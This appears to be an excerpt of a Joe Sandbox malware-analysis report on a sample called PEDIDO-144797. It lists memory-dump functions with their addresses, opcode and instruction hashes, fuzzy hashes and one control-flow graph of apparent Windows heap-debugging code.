                                                                                                                                          Function 326DA750 Relevance: .0, Instructions: 14COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                          • Instruction ID: d7ad18de7bcd85ac06d5b7e21d21f3db46d158eeec0d56596e30dc118ffbe33e
                                                                                                                                          • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                          • Instruction Fuzzy Hash: 76D012371D054CBBCF119F66DC01F957BA9EBA4B60F444020B504875A0CA7AE960D684
                                                                                                                                          Function 326B01C0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                          • Instruction ID: 3b84e8757cf68de126d80de89f466bbf30b8706d25223db9bf58d313b1b1355f
                                                                                                                                          • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                          • Instruction Fuzzy Hash: 04D0E979352D80DFD61ACB59C9A4B0573A4BB44B84FC14590E801CB762D66CE944CA14
                                                                                                                                          Function 326DC620 Relevance: .0, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                          • Instruction ID: 6354315c48536c259515a6967dea527c947fff313f2ea6918728d740718ec356
                                                                                                                                          • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                          • Instruction Fuzzy Hash: 1FC01232250644AFCB119A95CD01F0177A9EB98B00F000021F20447570C571E820D648
                                                                                                                                          Function 326C0230 Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                          • Instruction ID: 77514b0c57de48810f6dc34b183a57333ab8964a25c22981562e0d4b1d758e5c
                                                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                          • Instruction Fuzzy Hash: 8DD0123610064CEFCB01DF40C890D6A772AFFC8B10F108019FD19076148A75ED62DA54
                                                                                                                                          Function 326C332D Relevance: .0, Instructions: 10COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                          • Instruction ID: fd7a8cea1fe1943774de0fde53fc3581adb69649469470721d5fb2fbcc6c26f1
                                                                                                                                          • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                          • Instruction Fuzzy Hash: 9EC08CB82412C06AEF1A6B00C950B283A54EFC0B49FC0019CAE081D4A1CBABD8218308
                                                                                                                                          Function 326A0670 Relevance: .0, Instructions: 9COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                          • Instruction ID: 60ab404ad855bea224004c804e234842938aa794b8d974ec855d474bb4c20a00
                                                                                                                                          • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                          • Instruction Fuzzy Hash: 39C00139781A408FDE0ACA6AC284B097BE8BB84B81F150890E8058BA21E6A5E850CA11
                                                                                                                                          Function 326E4260 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 465b8f5f3bbcaabceff720cb9d580f82b0f33b8a8ea8f3a32eb267ec08474938
                                                                                                                                          • Instruction ID: 87b85a10cda1129e5f6a78879535ad158960be367c63f78bb08b7f9b802094b3
                                                                                                                                          • Opcode Fuzzy Hash: 465b8f5f3bbcaabceff720cb9d580f82b0f33b8a8ea8f3a32eb267ec08474938
                                                                                                                                          • Instruction Fuzzy Hash: 32900231605500229D40755C5B8455650055BE0311B51D456E0524914CCA25896A6361
                                                                                                                                          Function 326E4570 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 115e1b5a2b58918ad73c6f29e2bfd7f5a7787e73d720cacbbccc84fa8f49120f
                                                                                                                                          • Instruction ID: 44b9ebee561c61a71636ffa9ab37360909bc0e5f2e88f3c31ff23588e3256f2b
                                                                                                                                          • Opcode Fuzzy Hash: 115e1b5a2b58918ad73c6f29e2bfd7f5a7787e73d720cacbbccc84fa8f49120f
                                                                                                                                          • Instruction Fuzzy Hash: 8A900261601200524D40755C5B0441670055BE1311391D55AA0654920CC6298869A269
                                                                                                                                          Function 326E2A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9fbdf8c1589341435682e5a7b3d762861317e3cdc73a8d7238399bb792d80dbf
                                                                                                                                          • Instruction ID: f2399331a07600102e76f3bd24cd882269ec65dbdcf3b3af6a0937de738dd134
                                                                                                                                          • Opcode Fuzzy Hash: 9fbdf8c1589341435682e5a7b3d762861317e3cdc73a8d7238399bb792d80dbf
                                                                                                                                          • Instruction Fuzzy Hash: 2A900225221100120D45A95C170451B14455BD6361391D45AF1516950CC63288796321
                                                                                                                                          Function 326E2AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 61625ba9e73deb608cf333394f0e750bbedb5a3df0ba7ba88dba7e619d27ce6a
                                                                                                                                          • Instruction ID: de8cdb30b8fd03ef77649d9c7b900b856197985b9fe5ad412684291355dcfa8c
                                                                                                                                          • Opcode Fuzzy Hash: 61625ba9e73deb608cf333394f0e750bbedb5a3df0ba7ba88dba7e619d27ce6a
                                                                                                                                          • Instruction Fuzzy Hash: BF90023160510812DD50755C571475610054BD0311F51D456A0124A14DC7668A6976A1
                                                                                                                                          Function 326E2AA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 97a5eaa5b3dbc3f1153c6d0ea5aca54e5074173dbd8b6d4ddf62007d97be0c65
                                                                                                                                          • Instruction ID: 8dce1c291ddb576e133de9313ce800cef1032afad127ba3e53ae0084721c083a
                                                                                                                                          • Opcode Fuzzy Hash: 97a5eaa5b3dbc3f1153c6d0ea5aca54e5074173dbd8b6d4ddf62007d97be0c65
                                                                                                                                          • Instruction Fuzzy Hash: 0390023120110812DD04655C5B0469610054BD0311F51D456A6124A15ED67688A57131
                                                                                                                                          Function 326E2A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a8f33c2ff33e708520280c8d815a241d43c31d02540b503506891ac92ca71284
                                                                                                                                          • Instruction ID: f280eef56e539eda7b592eb11ad84412f05eef261fd1010a660cba41bba1b962
                                                                                                                                          • Opcode Fuzzy Hash: a8f33c2ff33e708520280c8d815a241d43c31d02540b503506891ac92ca71284
                                                                                                                                          • Instruction Fuzzy Hash: 2E900261202100134D05755C5714626500A4BE0211B51D466E1114950DC53688A57125
                                                                                                                                          Function 326E2B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4e2a5ee99b78003b234342999304e5b8e1d7dad63702a57cdc5c9667d93ea668
                                                                                                                                          • Instruction ID: f16e8b2717cbb4e9bd564078ac18f9d352f3b66841215c64ac1d577f620bf045
                                                                                                                                          • Opcode Fuzzy Hash: 4e2a5ee99b78003b234342999304e5b8e1d7dad63702a57cdc5c9667d93ea668
                                                                                                                                          • Instruction Fuzzy Hash: 2290023120514852DD40755C5704A5610154BD0315F51D456A0164A54DD6368D69B661
                                                                                                                                          Function 326E2B10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 13824fb9fe6f770ab6858871dd403ae07ce01029fcdf53fc6c00bc7824860a06
                                                                                                                                          • Instruction ID: fc62db56d78ddc94e2fd92bdd624677860a81a9206f59519714210c1b415a86d
                                                                                                                                          • Opcode Fuzzy Hash: 13824fb9fe6f770ab6858871dd403ae07ce01029fcdf53fc6c00bc7824860a06
                                                                                                                                          • Instruction Fuzzy Hash: 4390023120110812DD80755C570465A10054BD1311F91D45AA0125A14DCA268A6D77A1
                                                                                                                                          Function 326E2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 26f81830f21d5e7869c24bc0830c3022db567386eecd5dbed3af36b0d154be03
                                                                                                                                          • Instruction ID: 738030536dc7d0d8dad5746ac230881eb30871cc9b7c76db640dae6b9e188dd6
                                                                                                                                          • Opcode Fuzzy Hash: 26f81830f21d5e7869c24bc0830c3022db567386eecd5dbed3af36b0d154be03
                                                                                                                                          • Instruction Fuzzy Hash: CD90022160510412DD40755C671871610154BD0211F51E456A0124914DC66A8A6976A1
                                                                                                                                          Function 326E2B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f81c8a2da8a4903f3d05681cf90560e339adc56efe52a503c6671845ed5b2b91
                                                                                                                                          • Instruction ID: 897100bf4500ebe5c2f582e691f1e50d7fda5a174c99117cf76128298b8fa388
                                                                                                                                          • Opcode Fuzzy Hash: f81c8a2da8a4903f3d05681cf90560e339adc56efe52a503c6671845ed5b2b91
                                                                                                                                          • Instruction Fuzzy Hash: C590023120110852DD00655C5704B5610054BE0311F51D45BA0224A14DC626C8657521
                                                                                                                                          Function 326E38D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cdf41735ba4734afa7d89293cd846ec09f661f9b51768643bee3cb8a32ac112f
                                                                                                                                          • Instruction ID: a0f6920fce04fb1c18a77c574a73eec446382b4e2cc738612d63a3ba6239887f
                                                                                                                                          • Opcode Fuzzy Hash: cdf41735ba4734afa7d89293cd846ec09f661f9b51768643bee3cb8a32ac112f
                                                                                                                                          • Instruction Fuzzy Hash: 8C90022124515112DD50755C570462650056BE0211F51D466A0914954DC56688697221
                                                                                                                                          Function 326E29F0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 120cbe09b0465e931682ff97125b63826ac38286083194e5a92ecfe879552a25
                                                                                                                                          • Instruction ID: 2a36148c579326a489bad01de433f3c328744daa76fb4ffe4ad0f31668f176fc
                                                                                                                                          • Opcode Fuzzy Hash: 120cbe09b0465e931682ff97125b63826ac38286083194e5a92ecfe879552a25
                                                                                                                                          • Instruction Fuzzy Hash: 38900225211100130D05A95C170451710464BD5361351D466F1115910CD63288756121
                                                                                                                                          Function 326E29D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ca0b6311ee5e9650e2f46c0431245e19a8428ee1c23730705a8df325749c22a3
                                                                                                                                          • Instruction ID: e977a3de33da3a7456edbb318783ebf709fa27d45ffea254c965f73bd0d69dcf
                                                                                                                                          • Opcode Fuzzy Hash: ca0b6311ee5e9650e2f46c0431245e19a8428ee1c23730705a8df325749c22a3
                                                                                                                                          • Instruction Fuzzy Hash: 219002A1201240A24D00A65C9704B1A55054BE0211B51D45BE1154920CC5368865A135
                                                                                                                                          Function 326E2B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                          • Instruction ID: 5c6de5142f11cd2f6d201033fe94129b076719bb02ca427674e631ac9c93164f
                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                          Function 3277A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 509 3277a1f0-3277a269 call 326b2330 * 2 RtlDebugPrintTimes 515 3277a41f-3277a444 call 326b24d0 * 2 call 326e4b50 509->515 516 3277a26f-3277a27a 509->516 518 3277a2a4 516->518 519 3277a27c-3277a289 516->519 523 3277a2a8-3277a2b4 518->523 521 3277a28f-3277a295 519->521 522 3277a28b-3277a28d 519->522 525 3277a373-3277a375 521->525 526 3277a29b-3277a2a2 521->526 522->521 527 3277a2c1-3277a2c3 523->527 529 3277a39f-3277a3a1 525->529 526->523 530 3277a2b6-3277a2bc 527->530 531 3277a2c5-3277a2c7 527->531 532 3277a3a7-3277a3b4 529->532 533 3277a2d5-3277a2fd RtlDebugPrintTimes 529->533 535 3277a2be 530->535 536 3277a2cc-3277a2d0 530->536 531->529 538 3277a3b6-3277a3c3 532->538 539 3277a3da-3277a3e6 532->539 533->515 547 3277a303-3277a320 RtlDebugPrintTimes 533->547 535->527 537 3277a3ec-3277a3ee 536->537 537->529 542 3277a3c5-3277a3c9 538->542 543 3277a3cb-3277a3d1 538->543 544 3277a3fb-3277a3fd 539->544 542->543 548 3277a3d7 543->548 549 3277a4eb-3277a4ed 543->549 545 3277a3f0-3277a3f6 544->545 546 3277a3ff-3277a401 544->546 551 3277a447-3277a44b 545->551 552 3277a3f8 545->552 550 3277a403-3277a409 546->550 547->515 557 3277a326-3277a34c RtlDebugPrintTimes 547->557 548->539 549->550 553 3277a450-3277a474 RtlDebugPrintTimes 550->553 554 3277a40b-3277a41d RtlDebugPrintTimes 550->554 556 3277a51f-3277a521 551->556 552->544 553->515 560 3277a476-3277a493 RtlDebugPrintTimes 553->560 554->515 557->515 562 3277a352-3277a354 557->562 560->515 567 3277a495-3277a4c4 RtlDebugPrintTimes 560->567 564 3277a377-3277a38a 562->564 565 3277a356-3277a363 562->565 566 3277a397-3277a399 564->566 568 3277a365-3277a369 565->568 569 3277a36b-3277a371 565->569 570 3277a38c-3277a392 566->570 571 3277a39b-3277a39d 566->571 567->515 575 3277a4ca-3277a4cc 567->575 568->569 569->525 569->564 572 3277a394 570->572 573 3277a3e8-3277a3ea 570->573 571->529 572->566 573->537 576 3277a4f2-3277a505 575->576 577 3277a4ce-3277a4db 575->577 580 3277a512-3277a514 576->580 578 3277a4e3-3277a4e9 577->578 579 3277a4dd-3277a4e1 577->579 578->549 578->576 579->578 581 3277a507-3277a50d 580->581 582 3277a516 580->582 583 3277a50f 581->583 584 3277a51b-3277a51d 581->584 582->546 583->580 584->556
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: HEAP:
                                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                                          • Opcode ID: 5aeaa8808a901ac19b8c354ea1fd630c59d316bda5a623b504040588bc738a26
                                                                                                                                          • Instruction ID: 2138f9cc709cd7cba00a42a3e70122ef9b42e662f41ee209b67cb783b0bd2e19
                                                                                                                                          • Opcode Fuzzy Hash: 5aeaa8808a901ac19b8c354ea1fd630c59d316bda5a623b504040588bc738a26
